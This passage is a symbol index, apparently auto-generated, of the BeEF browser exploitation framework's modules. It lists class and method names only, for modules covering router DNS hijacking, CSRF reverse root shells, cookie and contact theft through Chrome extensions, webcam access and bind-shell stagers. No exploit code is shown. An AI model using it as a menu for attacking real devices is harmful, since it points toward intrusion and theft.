class Rickroll (line 6) | class Rickroll < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/hooked_origin/site_redirect/module.rb
class Site_redirect (line 6) | class Site_redirect < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/browser/hooked_origin/site_redirect_iframe/module.rb
class Site_redirect_iframe (line 6) | class Site_redirect_iframe < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 28) | def post_execute
FILE: modules/browser/play_sound/module.rb
class Play_sound (line 6) | class Play_sound < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/browser/remove_hook_element/module.rb
class Remove_hook_element (line 6) | class Remove_hook_element < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/spyder_eye/module.rb
class Spyder_eye (line 6) | class Spyder_eye < BeEF::Core::Command
method options (line 7) | def self.options
method pre_send (line 15) | def pre_send
method post_execute (line 19) | def post_execute
FILE: modules/browser/unhook/module.rb
class Unhook (line 6) | class Unhook < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/browser/webcam_flash/module.rb
class Webcam_flash (line 7) | class Webcam_flash < BeEF::Core::Command
method pre_send (line 8) | def pre_send
method options (line 13) | def self.options
method post_execute (line 46) | def post_execute
FILE: modules/browser/webcam_flash/swfobject.js
function f (line 4) | function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].ap...
function K (line 4) | function K(X){if(J){X()}else{U[U.length]=X}}
function s (line 4) | function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load"...
function h (line 4) | function h(){if(T){V()}else{H()}}
function V (line 4) | function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setA...
function H (line 4) | function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[a...
function z (line 4) | function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typ...
function A (line 4) | function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}
function P (line 4) | function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X...
function p (line 4) | function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNo...
function g (line 4) | function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML...
function u (line 4) | function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(...
function e (line 4) | function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttr...
function y (line 4) | function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.s...
function b (line 4) | function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function...
function c (line 4) | function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}
function C (line 4) | function C(X){return j.createElement(X)}
function i (line 4) | function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}
function F (line 4) | function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=pars...
function v (line 4) | function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagN...
function w (line 4) | function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z...
function L (line 4) | function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof...
FILE: modules/browser/webcam_html5/command.js
function size320 (line 104) | function size320() {
function size640 (line 108) | function size640() {
function sizeFull (line 112) | function sizeFull() {
FILE: modules/browser/webcam_html5/module.rb
class Webcam_html5 (line 7) | class Webcam_html5 < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/browser/webcam_permission_check/module.rb
class Webcam_permission_check (line 7) | class Webcam_permission_check < BeEF::Core::Command
method pre_send (line 8) | def pre_send
method post_execute (line 13) | def post_execute
FILE: modules/browser/webcam_permission_check/swfobject.js
function f (line 4) | function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].ap...
function K (line 4) | function K(X){if(J){X()}else{U[U.length]=X}}
function s (line 4) | function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load"...
function h (line 4) | function h(){if(T){V()}else{H()}}
function V (line 4) | function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setA...
function H (line 4) | function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[a...
function z (line 4) | function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typ...
function A (line 4) | function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}
function P (line 4) | function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X...
function p (line 4) | function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNo...
function g (line 4) | function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML...
function u (line 4) | function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(...
function e (line 4) | function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttr...
function y (line 4) | function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.s...
function b (line 4) | function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function...
function c (line 4) | function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}
function C (line 4) | function C(X){return j.createElement(X)}
function i (line 4) | function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}
function F (line 4) | function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=pars...
function v (line 4) | function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagN...
function w (line 4) | function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z...
function L (line 4) | function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof...
FILE: modules/chrome_extensions/execute_tabs/module.rb
class Execute_tabs (line 6) | class Execute_tabs < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/chrome_extensions/get_all_cookies/module.rb
class Get_all_cookies (line 6) | class Get_all_cookies < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/chrome_extensions/grab_google_contacts/command.js
function grabCSV (line 9) | function grabCSV(token){
function toolContact (line 17) | function toolContact(v) {
function grabContacts (line 27) | function grabContacts(){
FILE: modules/chrome_extensions/grab_google_contacts/module.rb
class Grab_google_contacts (line 6) | class Grab_google_contacts < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/chrome_extensions/inject_beef/module.rb
class Inject_beef (line 6) | class Inject_beef < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/chrome_extensions/screenshot/module.rb
class Screenshot (line 6) | class Screenshot < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/chrome_extensions/send_gvoice_sms/command.js
function sendSMSNOW (line 13) | function sendSMSNOW(message,number,token){
function sendSMS (line 28) | function sendSMS(message,number) {
FILE: modules/chrome_extensions/send_gvoice_sms/module.rb
class Send_gvoice_sms (line 6) | class Send_gvoice_sms < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/debug/test_beef_debug/module.rb
class Test_beef_debug (line 6) | class Test_beef_debug < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/debug/test_cors_request/module.rb
class Test_cors_request (line 6) | class Test_cors_request < BeEF::Core::Command
method post_execute (line 7) | def post_execute
method options (line 13) | def self.options
FILE: modules/debug/test_dns_tunnel_client/module.rb
class Test_dns_tunnel_client (line 6) | class Test_dns_tunnel_client < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/debug/test_get_variable/module.rb
class Test_get_variable (line 6) | class Test_get_variable < BeEF::Core::Command
method options (line 7) | def self.options
FILE: modules/debug/test_http_redirect/module.rb
class Test_http_redirect (line 6) | class Test_http_redirect < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method post_execute (line 11) | def post_execute
FILE: modules/debug/test_network_request/module.rb
class Test_network_request (line 6) | class Test_network_request < BeEF::Core::Command
method post_execute (line 7) | def post_execute
method options (line 13) | def self.options
FILE: modules/debug/test_return_ascii_chars/module.rb
class Test_return_ascii_chars (line 6) | class Test_return_ascii_chars < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/debug/test_return_image/module.rb
class Test_return_image (line 6) | class Test_return_image < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/debug/test_return_long_string/module.rb
class Test_return_long_string (line 6) | class Test_return_long_string < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/apache_cookie_disclosure/command.js
function setCookies (line 11) | function setCookies (good) {
function makeRequest (line 30) | function makeRequest() {
FILE: modules/exploits/apache_cookie_disclosure/module.rb
class Apache_cookies (line 6) | class Apache_cookies < BeEF::Core::Command
method post_execute (line 7) | def post_execute
FILE: modules/exploits/apache_felix_remote_shell/module.rb
class Apache_felix_remote_shell (line 6) | class Apache_felix_remote_shell < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/exploits/beefbind/beef_bind_shell/module.rb
class Beef_bind_shell (line 6) | class Beef_bind_shell < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/exploits/beefbind/shellcode_sources/linux/x64/socket64.c
function main (line 19) | int main(int argc, char **argv) {
FILE: modules/exploits/beefbind/shellcode_sources/linux/x86/socket.c
function main (line 19) | int main(int argc, char **argv) {
FILE: modules/exploits/beefbind/shellcode_sources/msf/beef_bind-handler.rb
type Msf (line 5) | module Msf
type Handler (line 6) | module Handler
type BeefBind (line 12) | module BeefBind
function handler_type (line 18) | def self.handler_type
function general_handler_type (line 25) | def self.general_handler_type
function initialize (line 33) | def initialize(info = {})
function cleanup_handler (line 46) | def cleanup_handler; end
function add_handler (line 51) | def add_handler(_opts = {})
function start_handler (line 59) | def start_handler; end
function stop_handler (line 64) | def stop_handler; end
FILE: modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
type MetasploitModule (line 12) | module MetasploitModule
function initialize (line 16) | def initialize(info = {})
function encode_stage? (line 79) | def encode_stage?
FILE: modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
type MetasploitModule (line 12) | module MetasploitModule
function initialize (line 16) | def initialize(info = {})
function encode_stage? (line 78) | def encode_stage?
FILE: modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
type MetasploitModule (line 16) | module MetasploitModule
function initialize (line 20) | def initialize(info = {})
function encode_stage? (line 123) | def encode_stage?
FILE: modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb
type MetasploitModule (line 11) | module MetasploitModule
function initialize (line 15) | def initialize(info = {})
FILE: modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
type MetasploitModule (line 11) | module MetasploitModule
function initialize (line 15) | def initialize(info = {})
FILE: modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
type MetasploitModule (line 15) | module MetasploitModule
function initialize (line 19) | def initialize(info = {})
FILE: modules/exploits/beefbind/shellcode_sources/windows/socket.c
function main (line 21) | int main(int argc, char **argv)
FILE: modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
class Boastmachine_add_user_csrf (line 6) | class Boastmachine_add_user_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 16) | def post_execute
FILE: modules/exploits/camera/airlive_ip_camera_csrf/module.rb
class Airlive_add_user_csrf (line 6) | class Airlive_add_user_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/camera/dlink_dcs_series_csrf/module.rb
class Dlink_dcs_series_csrf (line 6) | class Dlink_dcs_series_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
class Linksys_wvc_wireless_camera_csrf (line 6) | class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/coldfusion_dir_traversal_exploit/module.rb
class Coldfusion_dir_traversal_exploit (line 6) | class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/exploits/extract_cmd_exec/module.rb
class Extract_cmd_exec (line 14) | class Extract_cmd_exec < BeEF::Core::Command
method options (line 15) | def self.options
method post_execute (line 25) | def post_execute
FILE: modules/exploits/farsite_x25_remote_shell/module.rb
class Farsite_x25_remote_shell (line 1) | class Farsite_x25_remote_shell < BeEF::Core::Command
method options (line 2) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/firephp/module.rb
class Firephp_code_exec (line 8) | class Firephp_code_exec < BeEF::Core::Command
method pre_send (line 9) | def pre_send
method post_execute (line 53) | def post_execute
FILE: modules/exploits/glassfish_war_upload_xsrf/command.js
function byteValue (line 22) | function byteValue(x) {
function fileUpload (line 31) | function fileUpload(fileData, fileName) {
function addField (line 94) | function addField(name, value, boundary) {
function addFileField (line 101) | function addFileField(name, value, filename, boundary) {
function start (line 113) | function start() {
FILE: modules/exploits/glassfish_war_upload_xsrf/module.rb
class Glassfish_war_upload_xsrf (line 6) | class Glassfish_war_upload_xsrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 16) | def post_execute
FILE: modules/exploits/groovyshell_server_cmd_exec/module.rb
class Groovyshell_server_command_execution (line 6) | class Groovyshell_server_command_execution < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/exploits/hp_ucmdb_add_user_csrf/module.rb
class Hp_ucmdb_add_user_csrf (line 7) | class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 24) | def post_execute
FILE: modules/exploits/jboss_jmx_upload_exploit/command.js
function triggerReverseConn (line 39) | function triggerReverseConn(){
FILE: modules/exploits/jboss_jmx_upload_exploit/module.rb
class Jboss_jmx_upload_exploit (line 6) | class Jboss_jmx_upload_exploit < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 21) | def post_execute
FILE: modules/exploits/jenkins_groovy_code_exec/module.rb
class Jenkins_groovy_code_exec (line 6) | class Jenkins_groovy_code_exec < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 44) | def post_execute
FILE: modules/exploits/kemp_command_execution/module.rb
class Kemp_command_execution (line 6) | class Kemp_command_execution < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 16) | def post_execute
FILE: modules/exploits/local_host/activex_command_execution/module.rb
class Activex_command_execution (line 6) | class Activex_command_execution < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/exploits/local_host/java_payload/module.rb
class Java_payload (line 6) | class Java_payload < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 11) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb
class Mozilla_nsiprocess_interface (line 8) | class Mozilla_nsiprocess_interface < BeEF::Core::Command
method options (line 9) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/local_host/safari_launch_app/module.rb
class Safari_launch_app (line 6) | class Safari_launch_app < BeEF::Core::Command
method options (line 7) | def self.options
FILE: modules/exploits/local_host/signed_applet_dropper/applet/SM.java
class SM (line 8) | public class SM extends SecurityManager {
method checkPermission (line 9) | @Override
FILE: modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
class SignedApplet (line 13) | public class SignedApplet extends Applet {
method init (line 20) | public void init(){
method SignedApplet (line 31) | public SignedApplet(){
method download (line 38) | public static boolean download(){
method execute (line 62) | public static String execute() {
FILE: modules/exploits/local_host/signed_applet_dropper/command.js
function attach (line 14) | function attach(){
FILE: modules/exploits/local_host/signed_applet_dropper/module.rb
class Signed_applet_dropper (line 6) | class Signed_applet_dropper < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 13) | def self.options
method post_execute (line 21) | def post_execute
FILE: modules/exploits/local_host/window_mail_client_dos/module.rb
class Windows_mail_client_dos (line 6) | class Windows_mail_client_dos < BeEF::Core::Command
FILE: modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb
class Dlink_sharecenter_cmd_exec (line 10) | class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
method options (line 11) | def self.options
method post_execute (line 18) | def post_execute
FILE: modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
class Freenas_reverse_root_shell_csrf (line 9) | class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
method options (line 10) | def self.options
method post_execute (line 22) | def post_execute
FILE: modules/exploits/ntfscommoncreate_dos/module.rb
class Ntfscommoncreate_dos (line 6) | class Ntfscommoncreate_dos < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 11) | def post_execute
FILE: modules/exploits/opencart_reset_password/module.rb
class Opencart_reset_password (line 7) | class Opencart_reset_password < BeEF::Core::Command
method options (line 8) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/module.rb
class Pfsense_2_3_2_reverse_root_shell_csrf (line 6) | class Pfsense_2_3_2_reverse_root_shell_csrf < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 11) | def self.options
method post_execute (line 23) | def post_execute
FILE: modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/x.js
function ajax (line 2) | function ajax(url, method, data, async){
function loadToken (line 38) | function loadToken(){
function extractToken (line 44) | function extractToken(response){
function makeCSRF (line 56) | function makeCSRF(token){
FILE: modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/module.rb
class Pfsense_reverse_root_shell_csrf (line 6) | class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 19) | def post_execute
FILE: modules/exploits/php-5.3.9-dos/command.js
function createEvilObj (line 16) | function createEvilObj () {
function serializeObj (line 26) | function serializeObj (obj) {
function php_dos (line 35) | function php_dos (target_url) {
FILE: modules/exploits/php-5.3.9-dos/module.rb
class Php_dos (line 6) | class Php_dos < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/exploits/qemu_monitor_migrate_cmd_exec/module.rb
class Qemu_monitor_migrate_cmd_exec (line 6) | class Qemu_monitor_migrate_cmd_exec < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 32) | def post_execute
FILE: modules/exploits/qnx_qconn_command_execution/module.rb
class Qnx_qconn_command_execution (line 6) | class Qnx_qconn_command_execution < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 17) | def post_execute
FILE: modules/exploits/resource_exhaustion_dos/module.rb
class Resource_exhaustion_dos (line 6) | class Resource_exhaustion_dos < BeEF::Core::Command
method options (line 7) | def self.options
method pre_send (line 11) | def pre_send
method post_execute (line 22) | def post_execute
FILE: modules/exploits/rfi_scanner/module.rb
class Rfi_scanner (line 6) | class Rfi_scanner < BeEF::Core::Command
method pre_send (line 7) | def pre_send
method options (line 150) | def self.options
method post_execute (line 190) | def post_execute
FILE: modules/exploits/router/3com_officeconnect_cmd_exec/module.rb
class Com_officeconnect_cmd_exec (line 6) | class Com_officeconnect_cmd_exec < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/actiontec_q1000_csrf/module.rb
class Actiontec_q1000_csrf (line 6) | class Actiontec_q1000_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 16) | def post_execute
FILE: modules/exploits/router/argw4_adsl_dns_hijack/module.rb
class Argw4_adsl_dns_hijack (line 6) | class Argw4_adsl_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
class Asmax_ar804gu_cmd_exec (line 6) | class Asmax_ar804gu_cmd_exec < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/asus_dslx11_dns_hijack/module.rb
class Asus_dslx11_dns_hijack (line 6) | class Asus_dslx11_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/asus_rt_n12e_get_info/module.rb
class Asus_rt_n12e_get_info (line 6) | class Asus_rt_n12e_get_info < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/exploits/router/asus_rt_n66u_cmd_exec/module.rb
class Asus_rt_n66u_cmd_exec (line 6) | class Asus_rt_n66u_cmd_exec < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/beetel_bcm96338_router_dns_hijack/module.rb
class Beetel_bcm96338_router_dns_hijack (line 6) | class Beetel_bcm96338_router_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/belkin_dns_csrf/module.rb
class Belkin_dns_csrf (line 6) | class Belkin_dns_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/bt_home_hub_csrf/module.rb
class Bt_home_hub_csrf (line 6) | class Bt_home_hub_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/cisco_e2400_csrf/module.rb
class Cisco_e2400_csrf (line 6) | class Cisco_e2400_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/comtrend_ct5367_csrf/module.rb
class Comtrend_ct5367_csrf (line 6) | class Comtrend_ct5367_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/comtrend_ct5624_csrf/module.rb
class Comtrend_ct5624_csrf (line 6) | class Comtrend_ct5624_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/comtrend_ct_series_dns_hijack/module.rb
class Comtrend_ct_series_dns_hijack (line 6) | class Comtrend_ct_series_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb
class Ddwrt_v24_sp1_cmd_exec (line 6) | class Ddwrt_v24_sp1_cmd_exec < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 22) | def post_execute
FILE: modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb
class Ddwrt_v24_sp1_csrf (line 6) | class Ddwrt_v24_sp1_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 32) | def post_execute
FILE: modules/exploits/router/dlink_dir_615_csrf/module.rb
class Dlink_dir_615_csrf (line 6) | class Dlink_dir_615_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/dlink_dsl2640b_dns_hijack/module.rb
class Dlink_2640b_dns_hijack (line 6) | class Dlink_2640b_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/dlink_dsl2640u_dns_hijack/module.rb
class Dlink_dsl2640u_dns_hijack (line 6) | class Dlink_dsl2640u_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/dlink_dsl2740r_dns_hijack/module.rb
class Dlink_dsl2740r_dns_hijack (line 6) | class Dlink_dsl2740r_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/dlink_dsl2780b_dns_hijack/module.rb
class Dlink_dsl2780b_dns_hijack (line 6) | class Dlink_dsl2780b_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/dlink_dsl500t_csrf/module.rb
class Dlink_dsl500t_csrf (line 6) | class Dlink_dsl500t_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/dlink_dsl526b_dns_hijack/module.rb
class Dlink_dsl526b_dns_hijack (line 6) | class Dlink_dsl526b_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/exper_ewm01_adsl_dns_hijack/module.rb
class Exper_ewm01_adsl_dns_hijack (line 6) | class Exper_ewm01_adsl_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/huawei_smartax_mt880/module.rb
class Huawei_smartax_mt880_csrf (line 6) | class Huawei_smartax_mt880_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/iball_baton_ib_wra150n_dns_hijack/module.rb
class Iball_baton_ib_wra150n_dns_hijack (line 6) | class Iball_baton_ib_wra150n_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/inteno_eg101r1_voip_dns_hijack/module.rb
class Inteno_eg101r1_voip_dns_hijack (line 6) | class Inteno_eg101r1_voip_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/linksys_befsr41_csrf/module.rb
class Linksys_befsr41_csrf (line 6) | class Linksys_befsr41_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/linksys_e2500_csrf/module.rb
class Linksys_e2500_csrf (line 6) | class Linksys_e2500_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/linksys_e2500_dns_hijack/module.rb
class Linksys_e2500_dns_hijack (line 6) | class Linksys_e2500_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/linksys_e2500_shell/module.rb
class Linksys_e2500_shell (line 6) | class Linksys_e2500_shell < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/linksys_wrt54g2_csrf/module.rb
class Linksys_wrt54g2_csrf (line 6) | class Linksys_wrt54g2_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/linksys_wrt54g_csrf/module.rb
class Linksys_wrt54g_csrf (line 6) | class Linksys_wrt54g_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/netgear_dgn2000_wan_remote_mgmt/module.rb
class Netgear_dgn_2000_wan_mgmt_csrf (line 6) | class Netgear_dgn_2000_wan_mgmt_csrf < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/netgear_dgn2200_cmd_exec/module.rb
class Netgear_dgn2200_cmd_exec (line 6) | class Netgear_dgn2200_cmd_exec < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/phillips_dns_hijack/module.rb
class Philips_dns_hijack (line 5) | class Philips_dns_hijack < BeEF::Core::Command
method options (line 6) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/pikatel_96338_dns_hijack/module.rb
class Pikatel_96338_dns_hijack (line 6) | class Pikatel_96338_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/planet_vdr300nu_adsl_dns_hijack/module.rb
class Planet_vdr300nu_adsl_dns_hijack (line 6) | class Planet_vdr300nu_adsl_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/shuttle_tech_915wm_dns_hijack/module.rb
class Shuttle_tech_915wm_dns_hijack (line 6) | class Shuttle_tech_915wm_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/telstra_zte_mf91_change_pw/module.rb
class Telstra_zte_mf91_change_pw (line 6) | class Telstra_zte_mf91_change_pw < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/telstra_zte_mf91_change_ssid/module.rb
class Telstra_zte_mf91_change_ssid (line 6) | class Telstra_zte_mf91_change_ssid < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 14) | def post_execute
FILE: modules/exploits/router/telstra_zte_mf91_disable_ap_isolation/module.rb
class Telstra_zte_mf91_disable_ap_isolation (line 6) | class Telstra_zte_mf91_disable_ap_isolation < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 13) | def post_execute
FILE: modules/exploits/router/tenda_adsl_dns_hijack/module.rb
class Tenda_adsl_dns_hijack (line 6) | class Tenda_adsl_dns_hijack < BeEF::Core::Command
method options (line 7) | def self.options
method post_execute (line 15) | def post_execute
FILE: modules/exploits/router/tplink_dns_csrf/module.rb
